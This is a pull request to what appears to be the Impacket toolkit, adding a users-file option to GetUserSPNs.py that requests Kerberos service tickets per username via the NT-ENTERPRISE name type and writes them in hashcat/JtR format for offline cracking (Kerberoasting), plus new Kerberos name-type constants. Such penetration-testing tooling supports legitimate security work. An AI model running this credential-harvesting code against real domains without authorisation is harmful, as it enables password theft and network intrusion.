### PR TITLE
Adding new features for Kerberoasting

### DIFF
--- a/examples/GetNPUsers.py
+++ b/examples/GetNPUsers.py
@@ -199,6 +199,10 @@ class GetUserNoPreAuth:
             fd.write(entry + '\n')
 
     def run(self):
+        if self.__usersFile:
+            self.request_users_file_TGTs()
+            return
+
         if self.__doKerberos:
             target = self.getMachineName()
         else:
@@ -206,10 +210,6 @@ class GetUserNoPreAuth:
                 target = self.__kdcHost
             else:
                 target = self.__domain
-
-        if self.__usersFile:
-            self.request_users_file_TGTs()
-            return
 
         # Are we asked not to supply a password?
         if self.__doKerberos is False and self.__no_pass is True:

--- a/examples/GetUserSPNs.py
+++ b/examples/GetUserSPNs.py
@@ -287,7 +287,7 @@ class GetUserSPNs:
             resp = ldapConnection.search(searchFilter=searchFilter,
                                          attributes=['servicePrincipalName', 'sAMAccountName',
                                                      'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon'],
-                                         sizeLimit=999)
+                                         sizeLimit=100000)
         except ldap.LDAPSearchError as e:
             if e.getErrorString().find('sizeLimitExceeded') >= 0:
                 logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')

--- a/examples/GetUserSPNs.py
+++ b/examples/GetUserSPNs.py
@@ -75,6 +75,7 @@ class GetUserSPNs:
         self.__lmhash = ''
         self.__nthash = ''
         self.__outputFileName = cmdLineOptions.outputfile
+        self.__usersFile = cmdLineOptions.usersfile
         self.__aesKey = cmdLineOptions.aesKey
         self.__doKerberos = cmdLineOptions.k
         self.__requestTGS = cmdLineOptions.request
@@ -246,6 +247,10 @@ class GetUserSPNs:
                 logging.error(str(e))
 
     def run(self):
+        if self.__usersFile:
+            self.request_users_file_TGSs()
+            return
+
         if self.__doKerberos:
             target = self.getMachineName()
         else:
@@ -380,6 +385,39 @@ class GetUserSPNs:
         else:
             print("No entries found!")
 
+    def request_users_file_TGSs(self):
+
+        with open(self.__usersFile) as fi:
+            usernames = [line.strip() for line in fi]
+
+        self.request_multiple_TGSs(usernames)
+
+    def request_multiple_TGSs(self, usernames):
+        # Get a TGT for the current user
+        TGT = self.getTGT()
+
+        if self.__outputFileName is not None:
+            fd = open(self.__outputFileName, 'w+')
+        else:
+            fd = None
+
+        for username in usernames:
+            try:
+                principalName = Principal()
+                principalName.type = constants.PrincipalNameType.NT_ENTERPRISE.value
+                principalName.components = [username]
+
+                tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(principalName, self.__domain,
+                                                                        self.__kdcHost,
+                                                                        TGT['KDC_REP'], TGT['cipher'],
+                                                                        TGT['sessionKey'])
+                self.outputTGS(tgs, oldSessionKey, sessionKey, username, username, fd)
+            except Exception as e:
+                logging.debug("Exception:", exc_info=True)
+                logging.error('Principal: %s - %s' % (username, str(e)))
+
+        if fd is not None:
+            fd.close()
 
 # Process command-line arguments.
 if __name__ == '__main__':
@@ -393,6 +431,7 @@ if __name__ == '__main__':
     parser.add_argument('target', action='store', help='domain/username[:password]')
     parser.add_argument('-target-domain', action='store', help='Domain to query/request if different than the domain of the user. '
                                                                'Allows for Kerberoasting across trusts.')
+    parser.add_argument('-usersfile', help='File with user per line to test')
     parser.add_argument('-request', action='store_true', default='False', help='Requests TGS for users and output them '
                                                                                'in JtR/hashcat format (default False)')
     parser.add_argument('-request-user', action='store', metavar='username', help='Requests TGS for the SPN associated '

--- a/examples/GetUserSPNs.py
+++ b/examples/GetUserSPNs.py
@@ -383,7 +383,7 @@ class GetUserSPNs:
                                                                                 self.__kdcHost,
                                                                                 TGT['KDC_REP'], TGT['cipher'],
                                                                                 TGT['sessionKey'])
-                        self.outputTGS(tgs, oldSessionKey, sessionKey, sAMAccountName, downLevelLogonName, fd)
+                        self.outputTGS(tgs, oldSessionKey, sessionKey, sAMAccountName, self.__targetDomain + "/" + sAMAccountName, fd)
                     except Exception as e:
                         logging.debug("Exception:", exc_info=True)
                         logging.error('Principal: %s - %s' % (downLevelLogonName, str(e)))

--- a/impacket/krb5/constants.py
+++ b/impacket/krb5/constants.py
@@ -49,15 +49,20 @@ class ApplicationTagNumbers(Enum):
     KRB_ERROR      = 30
 
 class PrincipalNameType(Enum):
-    NT_UNKNOWN        = 0 
-    NT_PRINCIPAL      = 1
-    NT_SRV_INST       = 2
-    NT_SRV_HST        = 3
-    NT_SRV_XHST       = 4
-    NT_UID            = 5
-    NT_X500_PRINCIPAL = 6
-    NT_SMTP_NAME      = 7
-    NT_ENTERPRISE     = 10
+    NT_UNKNOWN              = 0
+    NT_PRINCIPAL            = 1
+    NT_SRV_INST             = 2
+    NT_SRV_HST              = 3
+    NT_SRV_XHST             = 4
+    NT_UID                  = 5
+    NT_X500_PRINCIPAL       = 6
+    NT_SMTP_NAME            = 7
+    NT_ENTERPRISE           = 10
+    NT_WELLKNOWN            = 11
+    NT_SRV_HST_DOMAIN       = 12
+    NT_MS_PRINCIPAL         = -128
+    NT_MS_PRINCIPAL_AND_ID  = -129
+    NT_ENT_PRINCIPAL_AND_ID = -130
 
 class PreAuthenticationDataTypes(Enum):
     PA_TGS_REQ                 = 1
@@ -161,19 +166,25 @@ class KerberosMessageTypes(Enum):
 
 # 7.5.8.  Name Types
 class NameTypes(Enum):
-    KRB_NT_UNKNOWN        = 0    # Name type not known
-    KRB_NT_PRINCIPAL      = 1    # Just the name of the principal as in DCE,
-                                 # or for users
-    KRB_NT_SRV_INST       = 2    # Service and other unique instance (krbtgt)
-    KRB_NT_SRV_HST        = 3    # Service with host name as instance
-                                 # (telnet, rcommands)
-    KRB_NT_SRV_XHST       = 4    # Service with host as remaining components
-    KRB_NT_UID            = 5    # Unique ID
-    KRB_NT_X500_PRINCIPAL = 6    # Encoded X.509 Distinguished name [RFC2253]
-    KRB_NT_SMTP_NAME      = 7    # Name in form of SMTP email name
-                                 # (e.g., user@example.com)
-    KRB_NT_ENTERPRISE     = 10   #   Enterprise name; may be mapped to
-                                 # principal name
+    KRB_NT_UNKNOWN              = 0    # Name type not known
+    KRB_NT_PRINCIPAL            = 1    # Just the name of the principal as in DCE,
+                                       # or for users
+    KRB_NT_SRV_INST             = 2    # Service and other unique instance (krbtgt)
+    KRB_NT_SRV_HST              = 3    # Service with host name as instance
+                                       # (telnet, rcommands)
+    KRB_NT_SRV_XHST             = 4    # Service with host as remaining components
+    KRB_NT_UID                  = 5    # Unique ID
+    KRB_NT_X500_PRINCIPAL       = 6    # Encoded X.509 Distinguished name [RFC2253]
+    KRB_NT_SMTP_NAME            = 7    # Name in form of SMTP email name
+                                       # (e.g., user@example.com)
+    KRB_NT_ENTERPRISE           = 10   #   Enterprise name; may be mapped to
+                                       # principal name
+    # Other Name Types
+    KRB_NT_WELLKNOWN            = 11
+    KRB_NT_SRV_HST_DOMAIN       = 12
+    KRB_NT_MS_PRINCIPAL         = -128
+    KRB_NT_MS_PRINCIPAL_AND_ID  = -129
+    KRB_NT_ENT_PRINCIPAL_AND_ID = -130
 
 # 7.5.9.  Error Codes
 class ErrorCodes(Enum):


### PR DESCRIPTION
Hello there,

This PR includes the following changes:

- Adding `-usersfile` option to GetUserSPNs.py, which requests tickets for each line from the specified file using the NT-ENTERPRISE type.
- Changing usage of Service Principal Names to usage of SAM Account Names, when `-usersfile` option is not in use.
- Changing sizeLimit in GetUserSPNs.py

This code is intended to cover scenarios when SPNs cannot be used, for example, when accounts have incorrect SPNs, or when accounts in another domain have SPNs with a NetBIOS Name hostnames.

Don't know if we need to keep the previous format, since this code, I hope, covers all the possible situations.

More information for all of the readers: https://swarm.ptsecurity.com/kerberoasting-without-spns/